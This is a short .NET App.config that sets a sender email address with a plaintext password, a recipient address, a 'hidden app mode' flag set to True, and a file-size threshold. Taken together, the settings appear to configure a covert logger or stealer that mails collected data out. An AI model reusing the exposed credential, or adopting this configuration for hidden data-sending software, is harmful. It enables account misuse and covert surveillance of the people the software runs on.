<?xml version="1.0" encoding="utf-8"?>

<configuration>
  <configSections>
      <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >
          <section name="Demo.Properties.Settings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />
      </sectionGroup>
  </configSections>
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
  </startup>
<userSettings>
    <Demo.Properties.Settings>
        <setting name="EmailAddressFrom" serializeAs="String">
            <value>ka1oken4by@gmail.com</value>
        </setting>
        <setting name="Password" serializeAs="String">
            <value>19980319lesh1</value>
        </setting>
        <setting name="EmailAddressTo" serializeAs="String">
            <value>mugory@cars2.club</value>
        </setting>
        <setting name="IsHiddenAppMode" serializeAs="String">
            <value>True</value>
        </setting>
        <setting name="FileSize" serializeAs="String">
            <value>10</value>
        </setting>
    </Demo.Properties.Settings>
  </userSettings>
</configuration>